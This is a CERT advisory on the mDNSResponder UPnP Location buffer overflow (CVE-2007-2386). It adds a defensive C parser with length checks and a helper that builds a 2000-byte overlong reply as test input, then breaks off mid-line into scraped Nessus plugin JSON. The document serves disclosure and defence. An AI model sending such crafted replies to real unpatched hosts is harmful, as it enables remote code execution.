Apple Mac OS X mDNSResponder buffer overflow vulnerability
2007-05-25T00:00:00
ID VU:221876 Type cert Reporter CERT Modified 2007-06-20T17:46:00
Description
Overview
Apple Mac OS X mDNSResponder contains a buffer overflow vulnerability that may allow an attacker to execute arbitrary code.
Description
mDNS uses IP multicast with DNS to provide the functionality of a DNS server for service discovery in networks that do not have a DNS server. mDNSResponder uses Multicast DNS Service Discovery for service discovery on the local network segment, and Unicast DNS Service Discovery for service discovery outside of the local network.
Bonjour provides zero-configuration networking for Apple OS X. mDNSResponder is included as a part of Bonjour and runs as a system service. mDNSResponder is included in OS X and Apple TV.
mDNSResponder contains a buffer overflow vulnerability. This vulnerability occurs in the UPnP IGD (Internet Gateway Device Standardized Device Control Protocol) code that is used to create dynamic port mappings in consumer routers.
Note that an attacker would need to be able to send multicast packets to a vulnerable system to exploit this vulnerability.
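Public exploit metadata for CVE-2007-2386 carries the title "Mac OS X mDNSResponder UPnP Location Overflow", so the field at issue is the Location header of a UPnP discovery reply. As an added example (not mDNSResponder's code and not Apple's fix), this C parser shows the length checks such a header needs before it is copied into a fixed buffer. `HOST_MAX`, the function names and the sample replies are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumption: 255 (the DNS name length limit) is a conservative bound for
 * this example. It is not the size of any buffer in mDNSResponder. */
#define HOST_MAX 255

enum loc_status { LOC_OK, LOC_MISSING, LOC_BAD_SCHEME, LOC_BAD_HOST,
                  LOC_HOST_TOO_LONG, LOC_BAD_PORT };

struct location { char host[HOST_MAX + 1]; unsigned port; };

/* Case-insensitive compare of exactly n bytes of a against literal b. */
static int ieq_n(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* Find header `name` in msg[0..len). The datagram is a counted buffer, never
 * a C string. Returns the trimmed value and stores its length in *vlen. */
static const char *find_header(const char *msg, size_t len,
                               const char *name, size_t *vlen)
{
    size_t nlen = strlen(name);
    const char *p = msg, *end = msg + len;
    while (p < end) {
        const char *eol = memchr(p, '\n', (size_t)(end - p));
        const char *le = eol ? eol : end;   /* end of this line */
        if ((size_t)(le - p) > nlen && p[nlen] == ':' && ieq_n(p, name, nlen)) {
            const char *v = p + nlen + 1;
            while (v < le && (*v == ' ' || *v == '\t')) v++;
            while (le > v && (le[-1] == '\r' || le[-1] == ' ')) le--;
            *vlen = (size_t)(le - v);
            return v;
        }
        if (!eol) break;
        p = eol + 1;
    }
    return NULL;
}

/* Parse "Location: http://host[:port]/path". Every length is checked before
 * the one copy into out->host. IPv6 literals are out of scope here. */
enum loc_status parse_location(const char *msg, size_t len, struct location *out)
{
    static const char scheme[] = "http://";
    size_t vlen = 0, slen = sizeof scheme - 1, hlen = 0, digits = 0;
    unsigned long port = 80;               /* default when no port is given */
    const char *v = find_header(msg, len, "Location", &vlen);
    if (!v) return LOC_MISSING;
    if (vlen < slen || !ieq_n(v, scheme, slen)) return LOC_BAD_SCHEME;
    v += slen; vlen -= slen;
    while (hlen < vlen && v[hlen] != ':' && v[hlen] != '/') hlen++;
    if (hlen == 0) return LOC_BAD_HOST;
    if (hlen > HOST_MAX) return LOC_HOST_TOO_LONG;  /* reject, do not truncate */
    memcpy(out->host, v, hlen);
    out->host[hlen] = '\0';
    if (hlen < vlen && v[hlen] == ':') {
        port = 0;
        for (size_t i = hlen + 1; i < vlen && v[i] != '/'; i++) {
            if (!isdigit((unsigned char)v[i]) || ++digits > 5) return LOC_BAD_PORT;
            port = port * 10 + (unsigned long)(v[i] - '0');
        }
        if (digits == 0 || port == 0 || port > 65535) return LOC_BAD_PORT;
    }
    out->port = (unsigned)port;
    return LOC_OK;
}

/* Constructed sample reply (not captured traffic). */
static const char SAMPLE_OK[] =
    "HTTP/1.1 200 OK\r\n"
    "ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    "LOCATION: http://192.168.1.1:5431/igd.xml\r\n\r\n";

/* Build a constructed reply whose Location host is hostlen filler bytes.
 * Returns the message length, or 0 if it does not fit in buf. */
size_t make_long_reply(char *buf, size_t bufsz, size_t hostlen)
{
    int n = snprintf(buf, bufsz, "HTTP/1.1 200 OK\r\nLocation: http://");
    size_t off = (size_t)n;
    if (n < 0 || off + hostlen + 4 > bufsz) return 0;
    memset(buf + off, 'a', hostlen);
    memcpy(buf + off + hostlen, "\r\n\r\n", 4);
    return off + hostlen + 4;
}

int main(void)
{
    static char big[4096];
    struct location loc;
    size_t n = make_long_reply(big, sizeof big, 2000);
    printf("normal reply   -> %d\n", parse_location(SAMPLE_OK, sizeof SAMPLE_OK - 1, &loc));
    printf("2000-byte host -> %d\n", parse_location(big, n, &loc));
    return 0;
}
```

The same checks work as a monitoring rule: a discovery reply on the local segment whose Location host exceeds the bound is worth logging whether or not the receiving host is patched.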
Impact
An attacker may be able to execute arbitrary code with root privileges, or create a denial of service condition.
Solution
Update
Apple has released Security Update 2007-005 to address this issue. Users are encouraged to apply these updates as soon as possible.
Restrict access
Until updates can be applied, creating a firewall rule to restrict access to 5353/udp and 1900/udp may mitigate this vulnerability. See the Apple Support document Creating an Advanced IP Firewall Rule for more information on how to create firewall rules. Note that blocking these ports may cause applications that rely on Bonjour to fail.
Vendor Information
Apple Computer, Inc. (Affected)
Updated: May 25, 2007
Status
Affected
Vendor Statement
We have not received a statement from the vendor.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
Addendum
See <http://docs.info.apple.com/article.html?artnum=305530> for more details.
Thanks to Apple for information that was used in this report. Apple thanks Michael Lynn of Juniper Networks for reporting this issue.
This document was written by Ryan Giobbi.
Other Information
CVE IDs: | CVE-2007-2386
---|---
Severity Metric: | 6.09
Date Public: | 2007-05-24
Date First Published: | 2007-05-25
Date Last Updated: | 2007-06-20 17:46 UTC
Document Revision: | 14
(!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/mDNSResponder\", unaffected:make_list(\"ge 212.1\"), vulnerable:make_list(\"lt 212.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mDNSResponder\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:42:30", "description": "The remote host is running a version of Mac OS X 10.4 or 10.3 that\ndoes not have Security Update 2007-005 applied. \n\nThis update fixes security flaws in the following applications :\n\nAlias Manager\nBIND\nCoreGraphics\ncrontabs\nfetchmail\nfile\niChat\nmDNSResponder\nPPP\nruby\nscreen\ntexinfo\nVPN", "edition": 26, "published": "2007-05-25T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2007-005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4573", "CVE-2007-0494", "CVE-2007-1558", "CVE-2007-0751", "CVE-2007-0753", "CVE-2007-0740", "CVE-2007-0493", "CVE-2007-2390", "CVE-2007-0752", "CVE-2007-2386", "CVE-2006-6303", "CVE-2006-4095", "CVE-2006-5467", "CVE-2007-1536", "CVE-2007-0750", "CVE-2005-3011", "CVE-2006-4096"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2007-005.NASL", "href": "https://www.tenable.com/plugins/nessus/25297", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\nif (NASL_LEVEL < 3000) exit(0);\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(25297);\n script_version (\"1.18\");\n\n script_cve_id(\"CVE-2005-3011\", \"CVE-2006-4095\", \"CVE-2006-4096\", \"CVE-2006-4573\", \"CVE-2006-5467\",\n \"CVE-2006-6303\", \"CVE-2007-0493\", \"CVE-2007-0494\", \"CVE-2007-0740\", \"CVE-2007-0750\",\n \"CVE-2007-0751\", \"CVE-2007-0752\", \"CVE-2007-0753\", \"CVE-2007-1536\", \"CVE-2007-1558\",\n \"CVE-2007-2386\", \"CVE-2007-2390\");\n script_bugtraq_id(24144, 24159);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2007-005)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes several\nsecurity issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.4 or 10.3 that\ndoes not have Security Update 2007-005 applied. \n\nThis update fixes security flaws in the following applications :\n\nAlias Manager\nBIND\nCoreGraphics\ncrontabs\nfetchmail\nfile\niChat\nmDNSResponder\nPPP\nruby\nscreen\ntexinfo\nVPN\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.info.apple.com/article.html?artnum=305530\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2007-005 :\n\nhttp://www.apple.com/support/downloads/securityupdate2007005universal.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X mDNSResponder UPnP Location Overflow');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(134, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/09/14\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/05/29\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\nscript_end_attributes();\n\n script_summary(english:\"Check for the presence of Security Update 2007-004\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-9]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2007-00[5-9]|200[89]-|20[1-9][0-9]-)\", string:packages))\n security_hole(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}